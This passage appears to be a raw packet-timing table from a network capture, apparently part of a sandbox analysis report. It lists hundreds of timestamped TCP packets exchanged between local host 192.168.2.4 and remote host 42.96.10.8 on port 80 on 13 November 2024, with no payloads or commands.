                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511298895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511342049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511353016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511353016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511369944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511388063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511404991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511421919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511451960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511451960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511451960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519746065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519819021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519845009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519861937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519877911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519893885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519908905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519927025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519927979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519927979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519927979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.519949913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520018101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520891905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520910978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520937920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520965099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520979881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.520998001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521013021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521022081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521080971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521095991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521096945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521096945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.521194935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.540250063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.540323019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.540337086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.540350914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.540771961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543087006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543104887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543133020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543150902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543152094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543288946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543322086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543337107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543361902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543365955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543392897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543421984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543438911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543456078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543467999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543484926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543488979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543520927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543602943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543631077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543643951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543648005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543687105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543689013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543709993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543798923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543798923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543894053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543922901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543950081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543963909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.543993950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544008017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544024944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544034958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544042110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544059038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544060946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544075966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544091940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544106007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544111013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544131041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544141054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544147015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544167042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544171095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544186115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544202089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544224024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544239044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544251919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544251919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544255018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544352055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544352055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544774055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544790983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544816017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544831991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544845104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544861078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544872046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544872046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544889927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544920921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544935942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544958115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544960976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544974089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544987917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.544992924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545017004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545032978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545048952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545068979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545077085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545077085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545077085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545082092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545105934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545123100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545136929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545162916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545176983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545185089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545185089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545185089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545195103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545208931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545223951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545239925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545258045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545274019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545281887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545281887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545281887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545290947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545308113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545324087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545339108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545352936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545372009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545372009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545380116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545394897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545409918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545423985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545434952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545438051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545459986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545475006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545485020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545500040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545515060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545523882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545530081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545553923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545559883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545571089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545586109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545593023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545603037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545618057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545633078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545650005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545650005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545650959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545669079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545685053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545700073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545712948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545722008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545722008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545737982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545741081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545754910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545770884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545783997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545785904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545802116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545808077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545814991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545830011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545844078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545844078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545857906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545861959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545891047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545898914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545916080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545929909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545945883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545960903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545975924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545986891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545986891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545986891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.545989990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546005011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546008110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546298981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546367884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546380997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546436071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546444893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546444893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546444893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546452999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546469927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546506882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546520948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546547890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546561956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546577930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546586037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546586990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546592951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546601057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546624899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546679020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546694994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546700001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546711922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546714067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546730042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546787024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546802044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546814919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546814919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546852112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546866894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546883106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546897888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546911955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546927929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546932936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546945095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546960115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546974897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546997070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.546997070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547032118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547046900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547061920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547074080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547106981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547122955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547137976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547152042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547153950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547163963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547204018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547204018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.547204018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553221941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553314924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553328037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553342104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553369045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553406954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553420067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553421974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553466082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553468943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553483009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553508043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553522110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553539038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553550959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553554058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553587914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553623915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.553991079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554007053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554023981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554094076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554109097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554126024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554141045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554141998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554161072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554162979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554178953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554194927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554194927 CET4973380192.168.2.442.96.10.8
